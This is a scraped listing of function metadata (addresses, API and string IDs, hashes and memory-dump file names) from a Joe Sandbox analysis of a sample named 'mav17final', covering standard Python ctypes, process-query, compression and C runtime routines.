                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 211107550-393685449
                                                  • Opcode ID: 688fb15556d862c72de40c94a9225dad620afe04ad3ce9f2b8c9a53cb021efd3
                                                  • Instruction ID: 3c22a6e04508f665704cd7a5c34085ff236c29c10647959716741840135e1d72
                                                  • Opcode Fuzzy Hash: 688fb15556d862c72de40c94a9225dad620afe04ad3ce9f2b8c9a53cb021efd3
                                                  • Instruction Fuzzy Hash: 1AE19D72A08A828AEB249F38D4803AD7BA0FB44F98F154175DF8D57796CF38E585DB00
                                                  Function 00007FF8B9F6BBE8 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc
                                                  • String ID: P$wrong type
                                                  • API String ID: 3617616757-281217272
                                                  • Opcode ID: e3327ad88a9a446218fbdf097499024a9865fdc2e91cfe0628b0646d4787f104
                                                  • Instruction ID: 519e3045958f1bce3aaa80ab281aabb8fe34c03ec857134fb0de40d515496021
                                                  • Opcode Fuzzy Hash: e3327ad88a9a446218fbdf097499024a9865fdc2e91cfe0628b0646d4787f104
                                                  • Instruction Fuzzy Hash: 6F716D61A0DBC681FA549F6DE85017927A1AF95BE3F186435CB4E473A6EF7CE800C350
                                                  Function 00007FF8B9F61ABC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_ParseSizeTuple_$Err_Long_StringVoid$AttrAuditCallable_CheckObject_OccurredSequence_Sys_Tuple
                                                  • String ID: argument must be callable or integer function address$cannot construct instance of this class: no argtypes
                                                  • API String ID: 2570622991-2742191083
                                                  • Opcode ID: 540973c798f55e8bddb45151d9b86c5f877ff1e98a5e2c5b0f3278a9c8d95e1e
                                                  • Instruction ID: d5713908191c56626c00f4860fc6dff1bb7d0e9102781d22a3d862e8be95aca3
                                                  • Opcode Fuzzy Hash: 540973c798f55e8bddb45151d9b86c5f877ff1e98a5e2c5b0f3278a9c8d95e1e
                                                  • Instruction Fuzzy Hash: BE513921B09B8285EA548F5ED5842B937A0EF86FE6F18A031DF4E477A5EF2CE451C310
                                                  Function 00007FF8B90C1FFC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: __acrt_iob_func
                                                  • String ID: %d work, %d block, ratio %5.2f$ too repetitive; using fallback sorting algorithm$VUUU
                                                  • API String ID: 711238415-2988393112
                                                  • Opcode ID: 9108c4c4e2d6d5df63023b1ab5f74cbde5b98f3dbb4d4334f7fd8b373665a9e5
                                                  • Instruction ID: 2ef05a97885942f4166cbd8d168f755fd38c877495f827a7aac0f2ff39c2af27
                                                  • Opcode Fuzzy Hash: 9108c4c4e2d6d5df63023b1ab5f74cbde5b98f3dbb4d4334f7fd8b373665a9e5
                                                  • Instruction Fuzzy Hash: B3416E32A08A8287EA149F2D944516977B4FB98B94F101236DF4E53BA6DF3DE58BC600
                                                  Function 00007FF8BA24C1D8 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                  • API String ID: 2943138195-2239912363
                                                  • Opcode ID: e6d89d71e33ac373f0738e0b515b9d7d47b180a069a0d86b59b00a9470073de2
                                                  • Instruction ID: 87794ff222bfa7f26308d5dd503ae55155608e90e169b81d8674656d9682d510
                                                  • Opcode Fuzzy Hash: e6d89d71e33ac373f0738e0b515b9d7d47b180a069a0d86b59b00a9470073de2
                                                  • Instruction Fuzzy Hash: DA514C62E18B9698FB11CBA8D8412BD3BB0BF08B88F4481B5DF4D12B95DF7CA144E750
                                                  Function 00007FF8B9078DA3 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Service$CloseConfig2ErrorHandleLastQuery
                                                  • String ID: QueryServiceConfig2W
                                                  • API String ID: 1882121732-608009358
                                                  • Opcode ID: 9112a224e2e793ec06f389caddcb9167c6d024421ef03c0fe177f940f9c403ab
                                                  • Instruction ID: 2b6c51dad916a087637dadf77fc8b765a82a6acf9fc21e1123999b70e17e7e99
                                                  • Opcode Fuzzy Hash: 9112a224e2e793ec06f389caddcb9167c6d024421ef03c0fe177f940f9c403ab
                                                  • Instruction Fuzzy Hash: 12413E21A1DAC682EE119F29E85416A7BA1FFA5BE0F441131EF4D43BA4EF7CE506C700
                                                  Function 00007FF8B98425C8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$DescriptorErr_FastFileObject_Sequence_String
                                                  • String ID: arguments 1-3 must be sequences$too many file descriptors in select()
                                                  • API String ID: 3320488554-3996108163
                                                  • Opcode ID: 05e470237c1967013c16db83c877e5144c843c525c657350500e77854bb128da
                                                  • Instruction ID: b7a3a5db239c75dd0935502f8e88f901d70a295a49c11a5aed60740bc3d9dfc4
                                                  • Opcode Fuzzy Hash: 05e470237c1967013c16db83c877e5144c843c525c657350500e77854bb128da
                                                  • Instruction Fuzzy Hash: 76417C32B09B8282EA149F19EA440397765FF94BE4F004236DB6E4B7A8DF3CE455C300
                                                  Function 00007FF8B9F62600 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CallDeallocObject_$FromFunctionLongLong_Traceback_
                                                  • String ID: GetResult$_ctypes/callproc.c
                                                  • API String ID: 2301701745-4166898048
                                                  • Opcode ID: 6b14f494761338040cbc18ac8ef32615b91be7de93a4bad4d1a784e7f6cbc817
                                                  • Instruction ID: 159b3db627a4d2c88eceb02e54e7a4254cb0ca142ed2b0d69b666f5ac67ca411
                                                  • Opcode Fuzzy Hash: 6b14f494761338040cbc18ac8ef32615b91be7de93a4bad4d1a784e7f6cbc817
                                                  • Instruction Fuzzy Hash: A8311E21E09BC382EE559F2DE91427927A0AF4ABE6F186534DF0E477A5DE3DE540C300
                                                  Function 00007FF8B90725C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleProcess$ErrorInfoLastMemoryOpen
                                                  • String ID: (kKKKKKKKKK)$OpenProcess$automatically set for PID 0
                                                  • API String ID: 3576067431-2652395995
                                                  • Opcode ID: c96220cb33b6c2f384865ab84d08a22d504b7e2c1e6550a0b9039a66c2826a71
                                                  • Instruction ID: 4015c4743318eafc00591e02c0af2a3ed5cc8cc189026c4b36bdf64e07902a8d
                                                  • Opcode Fuzzy Hash: c96220cb33b6c2f384865ab84d08a22d504b7e2c1e6550a0b9039a66c2826a71
                                                  • Instruction Fuzzy Hash: FF31CE21A0DBC681EE609F29E85437A6BA5FF98BE0F544136DB8D43765DF3CE4468B00
                                                  Function 00007FF8B9F69D58 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PyObject_IsInstance.PYTHON311(?,?,00000000,00007FF8B9F66BCC), ref: 00007FF8B9F69D73
                                                  • PyObject_IsInstance.PYTHON311(?,?,00000000,00007FF8B9F66BCC), ref: 00007FF8B9F69DBB
                                                  • PyErr_Format.PYTHON311(?,?,00000000,00007FF8B9F66BCC), ref: 00007FF8B9F69E4D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: InstanceObject_$Err_Format
                                                  • String ID: ???$expected %s instance instead of %s$expected %s instance instead of pointer to %s
                                                  • API String ID: 215623467-1082101171
                                                  • Opcode ID: c42a85ef290f4f7c7dec54bd01f908c692fe1a4d2cba32a0c83425372474c043
                                                  • Instruction ID: 68106031ce67aa7258cda29d2a91a1810957cf5eb9edc33848178feedb4ee397
                                                  • Opcode Fuzzy Hash: c42a85ef290f4f7c7dec54bd01f908c692fe1a4d2cba32a0c83425372474c043
                                                  • Instruction Fuzzy Hash: 4F312B21A08BC281EA549F2AE9400796761EF45FF6F68A132DF9D477A5DF3CE885C310
                                                  Function 00007FF8B9073750 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleProcess$CountersErrorLastOpen
                                                  • String ID: (KKKKKK)$OpenProcess$automatically set for PID 0
                                                  • API String ID: 1257226484-302434769
                                                  • Opcode ID: 97ea4f020694c1f111b7326fa42d3f1f607de4d13a1e6d7b72fbfc24bec8e139
                                                  • Instruction ID: f95048cc5d507771d73aae651fba74d343d5f5fa5de23e14c8b9ec6b3ecef829
                                                  • Opcode Fuzzy Hash: 97ea4f020694c1f111b7326fa42d3f1f607de4d13a1e6d7b72fbfc24bec8e139
                                                  • Instruction Fuzzy Hash: DF310D61B08A8792FE609F29F8543796BA0FF68BE0F545035DB4D427A4EE2CE446C700
                                                  Function 00007FF8B90C38BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: String$Bytes_Err_FromSizeThread_allocate_lockThread_free_lock
                                                  • String ID: Unable to allocate lock
                                                  • API String ID: 1127547223-3516605728
                                                  • Opcode ID: c17eff7bc98fcddad25fa0aa7e8872bdeafa31c641a1adeb9191edbd123e9819
                                                  • Instruction ID: c7aee2a8ffacfa59f06f5b868b0b9187a026e4a5e990d94736a45cfba27d5133
                                                  • Opcode Fuzzy Hash: c17eff7bc98fcddad25fa0aa7e8872bdeafa31c641a1adeb9191edbd123e9819
                                                  • Instruction Fuzzy Hash: D3310232A18A8296EF559F38E54837823B4FF54BD8F144235CB4E46699DF2CE88EC350
                                                  Function 00007FF8B9F6D81C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$BuildDeallocFromLong_OccurredSsize_tStringTuple_Value
                                                  • String ID: not a ctypes type or object$siN
                                                  • API String ID: 1444022424-92050270
                                                  • Opcode ID: 26a9fcd1b49395e45c52150cf6bc8a8343daf74cdcd0b31558393dc906a49e26
                                                  • Instruction ID: 1bd3ae9aa296c1c1a9d99eb7272e5af5ade451976be47909e7dcf1f85ace9bcb
                                                  • Opcode Fuzzy Hash: 26a9fcd1b49395e45c52150cf6bc8a8343daf74cdcd0b31558393dc906a49e26
                                                  • Instruction Fuzzy Hash: D8212721A09BC281EA549F2AE89427927A1EF89FE6F085135DB0E47764DF2CE451D320
                                                  Function 00007FF8B90C2780 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Buffer_$Arg_ArgumentBufferContiguousObject_ReleaseThread_acquire_lockThread_release_lockmemset
                                                  • String ID: argument$compress$contiguous buffer
                                                  • API String ID: 1731275941-2310704374
                                                  • Opcode ID: b138ca2d2723dab52cb10e3a74fac2df87b6dda8ec1f7609b2bdead44722ed7b
                                                  • Instruction ID: a2432adb877d1e6ca89f549caa85c98e4ec7967381ef783841c31bb8ba3dccca
                                                  • Opcode Fuzzy Hash: b138ca2d2723dab52cb10e3a74fac2df87b6dda8ec1f7609b2bdead44722ed7b
                                                  • Instruction Fuzzy Hash: 33111F62A18B8691EF10DF2DE8842A96371FB98BC4F558135DA4D43664DE2CE54AC700
                                                  Function 00007FF8B9F69FEC Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Buffer_Err_ReleaseString$BufferObject_memcpy
                                                  • String ID: byte string too long$cannot delete attribute
                                                  • API String ID: 1128862751-688604938
                                                  • Opcode ID: c0fad4b2d32ac0ab3663af02738014edb070c5b9f2759e00e789a8b2334ff090
                                                  • Instruction ID: 58edea6ae6ca165b29bb94f5cf83ca03ea5307b1a1dbdc959e282da44fe4ca07
                                                  • Opcode Fuzzy Hash: c0fad4b2d32ac0ab3663af02738014edb070c5b9f2759e00e789a8b2334ff090
                                                  • Instruction Fuzzy Hash: 54016962A18EC2D1EB10CF69E8540792760FF85BEAF645132CB5E873A4DF2DE548C700
                                                  Function 00007FF8B9F65950 Relevance: 13.7, APIs: 9, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 349153199-0
                                                  • Opcode ID: 31b097c5beb5f15cde6c2b56eb33e70b4a1a94a0495c7f4a48947f332bb9daf1
                                                  • Instruction ID: dc715efa0a0f5b1ddb4efd5c366fe9734519adace6c8997fee474ba3786a83fa
                                                  • Opcode Fuzzy Hash: 31b097c5beb5f15cde6c2b56eb33e70b4a1a94a0495c7f4a48947f332bb9daf1
                                                  • Instruction Fuzzy Hash: 7081AE20E1C7C386FA50AFADE48127966A0AF867F6F546035DB4DA7396DE3CE845C700
                                                  Function 00007FF8B9F62FC0 Relevance: 13.7, APIs: 9, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dict_Item$CallCheckDeallocErrorFunctionMakeObject_ResultTuple_UpdateWith
                                                  • String ID:
                                                  • API String ID: 1807771726-0
                                                  • Opcode ID: 42a6a9498eb4336f8fb7f7e14a875b7f35efea189098be1472c8111e8b538fde
                                                  • Instruction ID: 4092b79292877b96c07d39c21c5aadffacb8dc86ac767eecca3c782b2885a304
                                                  • Opcode Fuzzy Hash: 42a6a9498eb4336f8fb7f7e14a875b7f35efea189098be1472c8111e8b538fde
                                                  • Instruction Fuzzy Hash: 6D615B21A08BC292FA958F29E9443B927A0BF45BE6F186435DF4D077A9DF7CE095C300
                                                  Function 00007FF8B90767F0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 178COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AdaptersAddressesTable
                                                  • String ID: %wS$(Oikk)$GetIfTable() syscall failed
                                                  • API String ID: 3665156436-3214263222
                                                  • Opcode ID: 3238560b630cb62fcc133b6affa0500c3083dc838b0a7e8171d660494cb522c0
                                                  • Instruction ID: ff153014ce5d3445e9999be8308d0fabc088632fcfd709363acb476556c3d2c7
                                                  • Opcode Fuzzy Hash: 3238560b630cb62fcc133b6affa0500c3083dc838b0a7e8171d660494cb522c0
                                                  • Instruction Fuzzy Hash: CE816A32A08AC295EE659F29A8083B96BA0FF65BE4F444035DB4F47794DF3CE446CB11
                                                  Function 00007FF8BA2461AA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                  • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                  • API String ID: 1852475696-928371585
                                                  • Opcode ID: ca6cf6770a5e62d56dc10247fecd8c14e7675c1b430a8679457d8e3be21ba961
